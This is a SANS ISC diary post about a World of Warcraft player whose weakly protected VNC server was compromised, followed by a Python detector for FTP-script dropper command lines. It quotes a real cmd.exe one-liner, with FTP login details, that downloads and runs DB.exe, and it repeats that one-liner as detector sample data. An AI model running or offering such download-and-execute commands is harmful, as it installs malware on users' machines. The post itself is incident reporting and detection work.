
SANS ISC: InfoSec Handlers Diary Blog - WoW



Published: 2007-11-10
Last Updated: 2007-11-11 23:16:23 UTC
by Koon Yaw Tan (Version: 2)

Our reader Oscar shared with us that while he was playing World of Warcraft, he suddenly lost control of his character and saw some "strange" lines appear (injected command strings displayed within his WoW session). Below is a screenshot.

As he was also running a VNC server with an easily guessed password, this is what he got: a couple of files.
* DB.exe
* hirc.exe
* nc.exe
* PI.exe
* vnckiller.exe

If you have encountered a similar experience, let us know.

Lesson learnt: If you expose any service to the Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks, Oscar, for sharing.


Oscar wrote back and gave us a detailed description of what happened. Here is what he said:

So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.

So I was walking back out of the hearth spot, and my character started spinning around in circles, then my character said "aaaaaaaaa".

Then, what looked like code was also spoken by my character: "%systemroot%\system32\cmd.exe and then /c echo open 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit". So, this seemed curious, since I wasn't even on a Windows platform, so I manually logged into the ftp server, did a mget * and thought the SANS folks would be interested in these files.

Now, how did they get in? My guess here is that I had just installed the latest and greatest version of my favorite company's OS, and I turned on a feature called Screen Sharing, and also X'd the option to allow VNC users to log on with a password. Well, the password I picked was pretty guessable. When I logged into the previously mentioned ftp site, a program there was called vnckiller.exe, so I would assume that's how they got in. Lesson for the Day: Even if you're turning on a feature for testing purposes, don't choose an easy password, as most likely you'll forget to turn off this feature, and be rooted. Thank goodness I wasn't

A question for our readers: has anybody seen this happen to their session in WoW or any other virtual world simulation?
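The string Oscar's character "spoke" is a classic cmd.exe download-and-execute one-liner: a series of echo commands appends lines to a file, ftp -s: runs that file as a non-interactive FTP script, the script is deleted, and the fetched binary is launched. A host that records process command lines (Windows process-creation auditing, Sysmon and the like) can spot this chain without any signature for the payload name. The Python below is an added example, not code from the diary or from Oscar; it pulls such a command line apart into its stages and flags the combination. The sample command lines are constructed: the first is the string quoted in the diary, the other two are made-up benign commands so the detector can be seen declining to fire.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed samples (not real log data). Index 0 is the string from the
# diary; the others are benign look-alikes that must not be flagged.
SAMPLE_COMMAND_LINES = [
    r"%systemroot%\system32\cmd.exe /c echo open 21 >> ik &echo user B0t _A159753b >> ik "
    r"&echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit",
    r"cmd.exe /c echo build finished >> build.log",
    r"cmd.exe /c dir C:\Users && echo done",
]

ECHO_APPEND = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.IGNORECASE)
FTP_SCRIPT = re.compile(r"^ftp\b.*?-s:(\S+)", re.IGNORECASE)
DEL_FILE = re.compile(r"^(?:del|erase)\s+(\S+)", re.IGNORECASE)
GET_FILE = re.compile(r"^get\s+(\S+)", re.IGNORECASE)


@dataclass
class FtpScriptVerdict:
    script_file: Optional[str] = None                 # file the echo lines build up
    script_lines: List[str] = field(default_factory=list)  # FTP commands written into it
    ftp_runs_script: bool = False                     # "ftp -s:<that file>" appears later
    script_deleted: bool = False                      # "del <that file>" appears later
    fetched_files: List[str] = field(default_factory=list)  # names after "get" in the script
    executes_fetched_file: Optional[str] = None       # a fetched name run as its own command

    @property
    def suspicious(self) -> bool:
        # Building an FTP script and running it is unusual on its own; running the
        # download or scrubbing the script afterwards is what makes it a dropper.
        return self.ftp_runs_script and (
            self.executes_fetched_file is not None or self.script_deleted
        )


def _same_file(a: Optional[str], b: str) -> bool:
    return a is not None and a.lower() == b.lower()


def analyze(command_line: str) -> FtpScriptVerdict:
    """Split a cmd.exe command line on its & / && separators and track the
    echo -> ftp -s: -> del -> execute chain across the resulting segments."""
    verdict = FtpScriptVerdict()
    # Only the part after "/c" is the chained command; fall back to the whole line.
    m = re.search(r"/c\s+(.*)$", command_line, re.IGNORECASE)
    body = m.group(1) if m else command_line
    segments = [s.strip() for s in re.split(r"&&?", body) if s.strip()]

    for seg in segments:
        echo = ECHO_APPEND.match(seg)
        if echo:
            text, target = echo.group(1), echo.group(2)
            if verdict.script_file is None:
                verdict.script_file = target
            if _same_file(verdict.script_file, target):
                verdict.script_lines.append(text)
                get = GET_FILE.match(text)
                if get:
                    verdict.fetched_files.append(get.group(1))
            continue
        ftp = FTP_SCRIPT.match(seg)
        if ftp and _same_file(verdict.script_file, ftp.group(1)):
            verdict.ftp_runs_script = True
            continue
        dele = DEL_FILE.match(seg)
        if dele and _same_file(verdict.script_file, dele.group(1)):
            verdict.script_deleted = True
            continue
        # A segment that is just a fetched file name means "run what we downloaded".
        for fetched in verdict.fetched_files:
            if seg.lower() == fetched.lower() or seg.lower().endswith("\\" + fetched.lower()):
                verdict.executes_fetched_file = fetched
    return verdict


def flagged_lines(command_lines) -> List[str]:
    """Return the subset of command lines that look like an FTP-script dropper."""
    return [line for line in command_lines if analyze(line).suspicious]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        v = analyze(line)
        print("SUSPICIOUS" if v.suspicious else "ok        ", v.script_file, v.fetched_files)
```

The detector keys on the relationship between stages (the same file name being written by echo, consumed by ftp -s: and then deleted) rather than on any particular host, user or payload name, so it still fires when those are changed; an analyst would feed it the command-line field from process-creation events and triage the hits.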


Edwin wrote us and said that he has seen the same problem before. He pointed to for details on the exploit.
